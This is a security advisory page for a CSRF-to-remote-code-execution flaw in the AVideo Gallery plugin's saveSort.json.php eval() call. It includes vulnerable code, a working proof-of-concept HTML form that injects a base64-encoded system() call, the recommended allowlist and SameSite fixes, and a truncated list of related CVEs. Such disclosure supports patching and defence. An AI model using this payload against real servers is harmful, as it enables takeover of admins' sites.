PHP
CVE-2026-33479
HIGH
Severity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The Gallery plugin's saveSort.json.php endpoint passes unsanitized user input from $_REQUEST['sections'] array values directly into PHP's eval() function. While the endpoint is gated behind User::isAdmin(), it has no CSRF token validation. Combined with AVideo's explicit SameSite=None session cookie configuration, an attacker can exploit this via cross-site request forgery to achieve unauthenticated remote code execution - requiring only that an admin visits an attacker-controlled page.
Details
Vulnerable code - plugin/Gallery/view/saveSort.json.php:20-25:
if(!empty($_REQUEST['sections'])){
$object = $gallery->getDataObject();
foreach ($_REQUEST['sections'] as $key => $value) {
$obj->sectionsSaved[] = array($key=>$value);
eval("\$object->{$value}Order = \$key;");
}
$obj->error = !$gallery->setDataObject($object);
}The $value variable from $_REQUEST['sections'] is interpolated directly into the string passed to eval() with no sanitization - no allowlist, no regex validation, no escaping. Normal Gallery usage sends section names like 'Shorts', 'Trending', etc. from jQuery UI sortable, but the server enforces no such constraint.
CSRF enablement - objects/include_config.php:134-137:
if ($isHTTPS) {
ini_set('session.cookie_samesite', 'None');
ini_set('session.cookie_secure', '1');
}The session cookie is explicitly set to SameSite=None, which instructs browsers to send the cookie on cross-site requests. This is also reinforced in objects/functionsPHP.php:330-333 where additional cookies are set with SameSite=None; Secure.
No CSRF protection - The endpoint performs no CSRF token validation, no Origin header check, no Referer header check, and no X-Requested-With header check. There is no global CSRF middleware in AVideo's bootstrap chain.
Exploit chain:
- Attacker crafts a page with an auto-submitting form targeting
saveSort.json.php - Admin visits the attacker's page (e.g., via a link in a comment, email, or message)
- The browser sends the cross-site POST request with the admin's session cookie attached (due to
SameSite=None) User::isAdmin()passes because the admin's session is present- The injected PHP code in the
sectionsarray value is passed toeval()and executes
PoC
Step 1: Host the following HTML on an attacker-controlled server:
<!DOCTYPE html>
<html>
<body>
<form id="exploit" action="https://TARGET/plugin/Gallery/view/saveSort.json.php" method="POST">
<input type="hidden" name="sections[0]" value="x=1;system(base64_decode('aWQ7aG9zdG5hbWU='));//">
</form>
<script>document.getElementById('exploit').submit();</script>
</body>
</html>The base64 decodes to id;hostname.
Step 2: Lure an authenticated AVideo admin to visit the page.
Step 3: The eval on line 24 executes:
$object->x=1;system(base64_decode('aWQ7aG9zdG5hbWU='));//Order = 0;This breaks out of the property assignment, calls system() with attacker-controlled arguments, and comments out the rest of the line. The response JSON will contain the command output, but even without seeing the response, the command executes server-side.
Expected result: The id and hostname commands execute on the server under the web server's user context.
Impact
- Remote Code Execution - An attacker achieves arbitrary PHP code execution on the server by luring an admin to visit a malicious page. No prior authentication or account on the target is required.
- Full server compromise - The attacker can read/write files, access the database, pivot to other services, install backdoors, or exfiltrate data.
- Stealth - The attack is a single form submission that completes in milliseconds. The admin may not notice anything unusual.
- Blast radius - Any AVideo instance running over HTTPS (which triggers
SameSite=None) where an admin can be lured to click a link is vulnerable.
Recommended Fix
Primary fix - Replace eval() with an allowlist check:
In plugin/Gallery/view/saveSort.json.php, replace lines 20-26:
if(!empty($_REQUEST['sections'])){
$object = $gallery->getDataObject();
$allowedSections = ['Shorts', 'Trending', 'SiteSuggestion', 'Newest',
'Subscribe', 'Popular', 'LiveStream', 'Category',
'Program', 'Channel'];
foreach ($_REQUEST['sections'] as $key => $value) {
if (!in_array($value, $allowedSections, true)) {
continue;
}
$obj->sectionsSaved[] = array($key => $value);
$property = $value . 'Order';
$object->$property = intval($key);
}
$obj->error = !$gallery->setDataObject($object);
}This eliminates eval() entirely, validates $value against a known allowlist of section names, and uses dynamic property access ($object->$property) instead of code generation.
Secondary fix - Add CSRF protection to all state-changing endpoints, or at minimum set SameSite=Lax on session cookies instead of SameSite=None in objects/include_config.php:135:
ini_set('session.cookie_samesite', 'Lax');This prevents session cookies from being sent on cross-site form submissions, blocking the CSRF vector for all endpoints.
AnalysisAI
The Gallery plugin in AVideo contains an unauthenticated remote code execution vulnerability through CSRF-enabled PHP code injection. Attackers can exploit an eval() function that directly executes unsanitized user input by tricking an admin into visiting a malicious page, with the session cookie's SameSite=None configuration enabling cross-site request forgery. A detailed proof-of-concept exploit exists demonstrating command execution through crafted form submissions.
Technical ContextAI
This vulnerability affects the Gallery plugin component in the AVideo platform (pkg:composer/wwbn_avideo), specifically in the saveSort.json.php endpoint. The root cause is CWE-94 (Improper Control of Generation of Code / Code Injection), where user-supplied values from the $_REQUEST['sections'] array are interpolated directly into PHP's eval() function without sanitization. The vulnerability is compounded by AVideo's explicit configuration of session cookies with SameSite=None in objects/include_config.php, which instructs browsers to send authentication cookies on cross-site requests. The endpoint checks User::isAdmin() but implements no CSRF token validation, Origin/Referer header checks, or X-Requested-With validation, creating a complete chain from CSRF to RCE.
RemediationAI
The primary fix is to replace the eval() function in plugin/Gallery/view/saveSort.json.php with an allowlist-based approach that validates section names against known values (Shorts, Trending, SiteSuggestion, Newest, Subscribe, Popular, LiveStream, Category, Program, Channel) and uses dynamic property access instead of code generation. As a secondary defense, modify objects/include_config.php to set session.cookie_samesite to 'Lax' instead of 'None', which prevents session cookies from being sent on cross-site POST requests and blocks the CSRF vector. Organizations should monitor the official GitHub advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-xggw-g9pm-9qhh for patched versions. Until patches are applied, implement temporary mitigations including restricting admin access to trusted networks, deploying web application firewall rules to block suspicious saveSort.json.php requests, and educating administrators about the risk of clicking untrusted links while authenticated.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-94 – Code Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-xggw-g9pm-9qhh